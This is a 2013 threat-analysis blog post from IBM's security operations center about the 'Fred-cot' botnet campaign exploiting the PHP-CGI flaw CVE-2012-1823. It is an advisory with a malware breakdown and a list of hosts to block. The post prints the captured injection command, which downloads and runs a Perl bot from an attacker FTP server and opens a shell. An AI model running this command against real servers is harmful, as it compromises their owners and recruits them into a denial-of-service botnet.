November 7, 2013 By Bryan Ivey 4 min read

As a new addition to our securityintelligence.com site we will begin to more regularly feature threat analysis from IBM’s Managed Security Services organization.  This team operates a 24/7 Security Operations Center (SOC) on behalf of thousands of clients globally. 

“Fred-Cot” overview

On Saturday, November 2, the IBM SOC detected an active attack attempting to infect several webservers to become part of a botnet.  IBM has identified this attack with the name “Fred-cot.”  “Fred-cot” was part of the FTP URL where the malware repository was located as well as part of the user name / password required to access the site.  The attack, which was active over the weekend but began to taper off earlier this week, is attempting to exploit an older vulnerability in PHP.   It works by attempting to connect to port 80 (web) on a targeted IP and injecting a shell command, which if successful, allows the malware to infect the victim’s system.

Details of the attack

The original attack appeared to originate from the IP address 72.26.194.138. This attack was first spotted by our threat analysts at 7am Eastern on Saturday, November 2nd. IBM is identifying this attack as “Fred-cot.” This address appears to be crawling IP address ranges attempting to connect to port 80 (web) on the targeted IP. Once a connection has been made, the attacking system attempts to inject a shell command. If this command is successfully run on the victim’s system, this malware would connect to 31.204.152.37 via FTP to download gj.exe. Once gj.exe had been downloaded and executed, the victim’s system will be connected to an IRC channel and will wait for further commands.

Site names mail.sermonshare.com, mail.radioworship.net, web1.sermon.net, and web02.sermmonshare.com all resolve to the 72.26.194.138 address. Activity to and from these site names should be considered suspicious at this time. Site names mijn-site.be, jinraforest.be, faker.eu, euroveiling.com, busimatch.com and six other hosts resolve to 31.204.152.37. Any activity to or from these sites should be considered especially suspicious. This IP is the repository for the malicious code.

We have seen the following shell injection code being used in this attack:

unset HISTFILE; unset HISTSIZE; uname -a; cd /tmp;wget ftp[COLON]//fredcot[COLON]fredcot123[AT]31.204.152.37/gj.exe;perl gj.exe;rm -rf gj.exe;w; id; /bin/sh -i’;x0a$daemo

83.170.75.200 appears to be the IP address of the IRC server the malware payload is using as a command and control (C&C) server.

We strongly recommend applying firewall rules to block any access to or from the 72.26.194.138, 31.204.152.37, and 83.170.75.200 addresses. Security teams should be aware that IP addresses specified could potentially change. Some anti-virus vendors can detect this malware and it is advisable to verify your software and definition files are up to date.

Malware analysis

This attack appears to be targeting an old vulnerability, CVE-2012-1823, in various versions of PHP paired with Apache web servers. This vulnerability was patched in 5.4.3 and 5.3.13 last year and we covered it in a number of assessments in the months of May and June. This vulnerability deals with an obscure portion of the CGI specification. Other web servers do not adhere to these specifications as Apache does.

The payload of the attack, gj.exe, contrary to implications the name implies, is not a Microsoft executable, it is a Perl script. There were four different variations of the script on the compromised site located at 31.204.152.37 that contained slight differences with the IRC server, ports used, IRC admins, and channels. There were also a number of files containing IP addresses, although their exact use is not known. Other tools located in the directory structure may have been used to generate the list of targets or possibly used in another form of attack.

Once infected and executing the malware, the victim’s system would become just another bot in the botnet. Based on the code, it appears the malware attempts to avoid detection by hiding itself as just another /usr/sbin/sshd process on the system. Connecting back to an IRC server, the victim would wait for commands sent to it through a private message. These commands could include

  • tcpflood used to send packets to a specific host / port combination for a specified time to generate a denial of service condition
  • udpflood used to send packets to a specific host with a designated packet size for a specified time to generate a denial of service condition
  • httpflood used to retrieve the index page of a specific host for a specified time to generate a denial of service condition
  • portscan used to scan a specified list of ports, including 21, 22, 25, and 80, as well as others
  • google used to search Google for references to sites with modules.php installed, possibly used to determine additional vulnerable sites
  • Also included in the code were a number of routines specific to IRC commands, such as connecting to a server, registering with a random nick (vn#### was the pattern used), joining channels, and exiting the IRC server. A subroutine in the malware might have been intended to allow the attacker to execute a remote command on the infected system.

Take action

We strongly suggest that our readers take the time to verify their PHP installations are current and are patched against this old vulnerability. This attack seems to indicate there may be systems facing the Internet that are not. As mentioned before, some anti-virus products do detect this malware. Users should ensure their anti-virus software and associated definition files are up to date. It is also advisable to block traffic to and from the hosts listed below at the perimeter firewalls. Please note, these are the IP addresses we have detected in this wave of attacks and could potentially change in the future.  Administrators should monitor their logs for any suspicious activity.

Current list of hosts that should be blocked due to malicious activity:

  • IPv4: 72.26.194.138 – Original attack vector
  • IPv4: 85.214.35.154 – Reverse shell destination
  • IPv4: 31.204.152.37 – FTP malware repository
  • IPv4: 83.170.75.200 – IRC server used for CnC
  • IPv4: 78.109.84.137 – IRC server used for CnC
  • IPv4: 50.57.71.234 – Additional attack vector
  • URI: army1.megaforce.co.il – IRC server used for CnC
  • URI: army2.megaforce.co.il – IRC server used for CnC
  • URI: army3.megaforce.co.il – IRC server used for CnC
  • URI: army4.megaforce.co.il – IRC server used for CnC
  • URI: army5.megaforce.co.il – IRC server used for CnC
  • URI: army6.megaforce.co.il – IRC server used for CnC
  • URI: army7.megaforce.co.il – IRC server used for CnC
  • URI: army8.megaforce.co.il – IRC server used for CnC
  • URI: army9.megaforce.co.il – IRC server used for CnC

More from Threat Intelligence

Ongoing ITG05 operations leverage evolving malware arsenal in global campaigns

13 min read - As of March 2024, X-Force is tracking multiple ongoing ITG05 phishing campaigns featuring lure documents crafted to imitate authentic documents of government and non-governmental organizations (NGOs) in Europe, the South Caucasus, Central Asia, and North and South America. The uncovered lures include a mixture of internal and publicly available documents, as well as possible actor-generated documents associated with finance, critical infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production. Beginning in November 2023, X-Force observed ITG05…

CVE-2023-20078 technical analysis: Identifying and triggering a command injection vulnerability in Cisco IP phones

7 min read - CVE-2023-20078 catalogs an unauthenticated command injection vulnerability in the web-based management interface of Cisco 6800, 7800, and 8800 Series IP Phones with Multiplatform Firmware installed; however, limited technical analysis is publicly available. This article presents my findings while researching this vulnerability. In the end, the reader should be equipped with the information necessary to understand and trigger this vulnerability.Vulnerability detailsThe following Cisco Security Advisory (Cisco IP Phone 6800, 7800, and 8800 Series Web UI Vulnerabilities - Cisco) details CVE-2023-20078 and…

X-Force data reveals top spam trends, campaigns and senior superlatives in 2023

10 min read - The 2024 IBM X-Force Threat Intelligence Index revealed attackers continued to pivot to evade detection to deliver their malware in 2023. The good news? Security improvements, such as Microsoft blocking macro execution by default starting in 2022 and OneNote embedded files with potentially dangerous extensions by mid-2023, have changed the threat landscape for the better. Improved endpoint detection also likely forced attackers to shift away from other techniques prominent in 2022, such as using disk image files (e.g. ISO) and…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today